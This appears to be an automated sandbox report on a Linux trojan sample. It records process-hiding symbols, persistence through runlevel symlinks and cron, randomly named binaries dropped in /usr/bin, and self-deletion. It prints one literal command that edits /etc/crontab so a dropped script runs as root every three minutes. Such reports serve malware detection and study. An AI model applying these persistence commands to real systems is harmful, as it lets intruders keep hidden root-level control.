Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: ccxfvtbhgr.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: HideFile
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: __free_hook
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: ezztyrfjzf.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: HideFile
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: __free_hook
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: dyuvutukki.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: HideFile
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: __free_hook
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: vapcvdizxx.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: HideFile
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: __free_hook
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: lkzqkklpfr.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: HideFile
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: __free_hook
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: cpbnjarskl.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: HideFile
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: __free_hook
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: uaewjndswe.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: HideFile
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: __free_hook
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: efgdvbpuxx.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: HideFile
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: __free_hook
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: nxattrsdxm.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: HideFile
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: __free_hook
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: bjhrrojebv.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: HideFile
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: __free_hook
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: vlteqhfomz.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: HideFile
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: __free_hook
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wxysocrflf.11.dr	ELF static info symbol of dropped file: __memalign_hook

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/19@10/0

Source: /tmp/1.elf (PID: 6205)

/run/gcc.pid: fgmoabirnicsesqjfpuivnebyqywfxxm

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/1.elf (PID: 6205)	File: /etc/rc1.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc2.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc3.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc4.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc5.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc.d/rc1.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc.d/rc2.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc.d/rc3.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc.d/rc4.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /etc/rc.d/rc5.d/S901.elf -> /etc/init.d/1.elf			Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/1.elf (PID: 6205)	File: /etc/cron.hourly/gcc.sh			Jump to behavior
Source: /bin/sh (PID: 6210)	File: /etc/crontab			Jump to behavior
Source: /bin/sed (PID: 6211)	File: /etc/crontab			Jump to behavior

Source: /tmp/1.elf (PID: 6205)	File written: /usr/lib/libudev.so			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/ccxfvtbhgr			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/ezztyrfjzf			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/dyuvutukki			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/vapcvdizxx			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/lkzqkklpfr			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/cpbnjarskl			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/uaewjndswe			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/efgdvbpuxx			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/nxattrsdxm			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/bjhrrojebv			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/vlteqhfomz			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/wxysocrflf			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File written: /usr/bin/ssrfvzfvpk			Jump to dropped file

Source: /tmp/1.elf (PID: 6205)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Source: /tmp/1.elf (PID: 6205)	Reads from proc file: /proc/stat			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	Reads from proc file: /proc/meminfo			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	Reads from proc file: /proc/cpuinfo			Jump to behavior

Source: /sbin/update-rc.d (PID: 6215)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/1.elf (PID: 6210)

Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

Jump to behavior

Source: /tmp/1.elf (PID: 6205)

Writes shell script file to disk with an unusual file extension: /etc/init.d/1.elf

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/1.elf (PID: 6205)	File: /etc/init.d/1.elf			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ccxfvtbhgr			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ezztyrfjzf			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/dyuvutukki			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/vapcvdizxx			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/lkzqkklpfr			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/cpbnjarskl			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/uaewjndswe			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/efgdvbpuxx			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/nxattrsdxm			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/bjhrrojebv			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/vlteqhfomz			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/wxysocrflf			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ssrfvzfvpk			Jump to dropped file

Sample deletes itself

Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ccxfvtbhgr			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ezztyrfjzf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/dyuvutukki			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/vapcvdizxx			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/lkzqkklpfr			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/cpbnjarskl			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/uaewjndswe			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/efgdvbpuxx			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/nxattrsdxm			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/bjhrrojebv			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/vlteqhfomz			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/wxysocrflf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ssrfvzfvpk			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/bhmsjmfdgk			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ctjziyscga			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ggufoivoip			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/gvjfjjanun			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/fubjkoogoo			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/ptcfhyyirf			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/bsvlwqppmd			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/uhjknuzvai			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	File: /usr/bin/lkpssqmflq			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6240)	File: /usr/bin/ccxfvtbhgr			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6243)	File: /usr/bin/ccxfvtbhgr			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6248)	File: /usr/bin/ccxfvtbhgr			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6251)	File: /usr/bin/ccxfvtbhgr			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6252)	File: /usr/bin/ccxfvtbhgr			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6259)	File: /usr/bin/ezztyrfjzf			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6262)	File: /usr/bin/ezztyrfjzf			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6267)	File: /usr/bin/ezztyrfjzf			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6270)	File: /usr/bin/ezztyrfjzf			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6271)	File: /usr/bin/ezztyrfjzf			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6276)	File: /usr/bin/dyuvutukki			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6280)	File: /usr/bin/dyuvutukki			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6283)	File: /usr/bin/dyuvutukki			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6287)	File: /usr/bin/dyuvutukki			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6288)	File: /usr/bin/dyuvutukki			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6314)	File: /usr/bin/vapcvdizxx			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6319)	File: /usr/bin/vapcvdizxx			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6322)	File: /usr/bin/vapcvdizxx			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6325)	File: /usr/bin/vapcvdizxx			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6326)	File: /usr/bin/vapcvdizxx			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6331)	File: /usr/bin/lkzqkklpfr			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6334)	File: /usr/bin/lkzqkklpfr			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6339)	File: /usr/bin/lkzqkklpfr			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6342)	File: /usr/bin/lkzqkklpfr			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6343)	File: /usr/bin/lkzqkklpfr			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6348)	File: /usr/bin/cpbnjarskl			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6352)	File: /usr/bin/cpbnjarskl			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6356)	File: /usr/bin/cpbnjarskl			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6359)	File: /usr/bin/cpbnjarskl			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6360)	File: /usr/bin/cpbnjarskl			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6365)	File: /usr/bin/uaewjndswe			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6369)	File: /usr/bin/uaewjndswe			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6373)	File: /usr/bin/uaewjndswe			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6376)	File: /usr/bin/uaewjndswe			Jump to behavior
Source: /usr/bin/uaewjndswe (PID: 6377)	File: /usr/bin/uaewjndswe			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6384)	File: /usr/bin/efgdvbpuxx			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6387)	File: /usr/bin/efgdvbpuxx			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6392)	File: /usr/bin/efgdvbpuxx			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6395)	File: /usr/bin/efgdvbpuxx			Jump to behavior
Source: /usr/bin/efgdvbpuxx (PID: 6396)	File: /usr/bin/efgdvbpuxx			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6404)	File: /usr/bin/nxattrsdxm			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6407)	File: /usr/bin/nxattrsdxm			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6410)	File: /usr/bin/nxattrsdxm			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6413)	File: /usr/bin/nxattrsdxm			Jump to behavior
Source: /usr/bin/nxattrsdxm (PID: 6416)	File: /usr/bin/nxattrsdxm			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6421)	File: /usr/bin/bjhrrojebv			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6426)	File: /usr/bin/bjhrrojebv			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6429)	File: /usr/bin/bjhrrojebv			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6432)	File: /usr/bin/bjhrrojebv			Jump to behavior
Source: /usr/bin/bjhrrojebv (PID: 6433)	File: /usr/bin/bjhrrojebv			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6438)	File: /usr/bin/vlteqhfomz			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6443)	File: /usr/bin/vlteqhfomz			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6446)	File: /usr/bin/vlteqhfomz			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6449)	File: /usr/bin/vlteqhfomz			Jump to behavior
Source: /usr/bin/vlteqhfomz (PID: 6450)	File: /usr/bin/vlteqhfomz			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6455)	File: /usr/bin/wxysocrflf			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6459)	File: /usr/bin/wxysocrflf			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6463)	File: /usr/bin/wxysocrflf			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6466)	File: /usr/bin/wxysocrflf			Jump to behavior
Source: /usr/bin/wxysocrflf (PID: 6467)	File: /usr/bin/wxysocrflf			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6472)	File: /usr/bin/ssrfvzfvpk			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6476)	File: /usr/bin/ssrfvzfvpk			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6480)	File: /usr/bin/ssrfvzfvpk			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6481)	File: /usr/bin/ssrfvzfvpk			Jump to behavior
Source: /usr/bin/ssrfvzfvpk (PID: 6484)	File: /usr/bin/ssrfvzfvpk			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6490)	File: /usr/bin/bhmsjmfdgk			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6493)	File: /usr/bin/bhmsjmfdgk			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6497)	File: /usr/bin/bhmsjmfdgk			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6501)	File: /usr/bin/bhmsjmfdgk			Jump to behavior
Source: /usr/bin/bhmsjmfdgk (PID: 6502)	File: /usr/bin/bhmsjmfdgk			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6507)	File: /usr/bin/ctjziyscga			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6511)	File: /usr/bin/ctjziyscga			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6515)	File: /usr/bin/ctjziyscga			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6520)	File: /usr/bin/ctjziyscga			Jump to behavior
Source: /usr/bin/ctjziyscga (PID: 6521)	File: /usr/bin/ctjziyscga			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6526)	File: /usr/bin/ggufoivoip			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6530)	File: /usr/bin/ggufoivoip			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6532)	File: /usr/bin/ggufoivoip			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6536)	File: /usr/bin/ggufoivoip			Jump to behavior
Source: /usr/bin/ggufoivoip (PID: 6538)	File: /usr/bin/ggufoivoip			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6544)	File: /usr/bin/gvjfjjanun			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6547)	File: /usr/bin/gvjfjjanun			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6552)	File: /usr/bin/gvjfjjanun			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6555)	File: /usr/bin/gvjfjjanun			Jump to behavior
Source: /usr/bin/gvjfjjanun (PID: 6556)	File: /usr/bin/gvjfjjanun			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6564)	File: /usr/bin/fubjkoogoo			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6568)	File: /usr/bin/fubjkoogoo			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6569)	File: /usr/bin/fubjkoogoo			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6572)	File: /usr/bin/fubjkoogoo			Jump to behavior
Source: /usr/bin/fubjkoogoo (PID: 6573)	File: /usr/bin/fubjkoogoo			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6580)	File: /usr/bin/ptcfhyyirf			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6584)	File: /usr/bin/ptcfhyyirf			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6588)	File: /usr/bin/ptcfhyyirf			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6589)	File: /usr/bin/ptcfhyyirf			Jump to behavior
Source: /usr/bin/ptcfhyyirf (PID: 6590)	File: /usr/bin/ptcfhyyirf			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6601)	File: /usr/bin/bsvlwqppmd			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6605)	File: /usr/bin/bsvlwqppmd			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6607)	File: /usr/bin/bsvlwqppmd			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6609)	File: /usr/bin/bsvlwqppmd			Jump to behavior
Source: /usr/bin/bsvlwqppmd (PID: 6610)	File: /usr/bin/bsvlwqppmd			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6618)	File: /usr/bin/uhjknuzvai			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6622)	File: /usr/bin/uhjknuzvai			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6623)	File: /usr/bin/uhjknuzvai			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6626)	File: /usr/bin/uhjknuzvai			Jump to behavior
Source: /usr/bin/uhjknuzvai (PID: 6627)	File: /usr/bin/uhjknuzvai			Jump to behavior

Source: /tmp/1.elf (PID: 6205)	Path: /etc/cron.hourly/gcc.sh			Jump to dropped file
Source: /tmp/1.elf (PID: 6205)	Path: /run/gcc.pid			Jump to dropped file

Source: /tmp/1.elf (PID: 6204)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/1.elf (PID: 6205)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6239)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6242)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6245)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6247)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ccxfvtbhgr (PID: 6250)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6258)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6261)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6264)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6266)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ezztyrfjzf (PID: 6269)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6275)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6278)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6281)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6284)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dyuvutukki (PID: 6286)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6313)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6316)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6318)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6321)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vapcvdizxx (PID: 6324)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6330)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6333)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6336)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6338)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lkzqkklpfr (PID: 6341)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cpbnjarskl (PID: 6347)	Queries kernel information via 'uname':			Jump to behavior
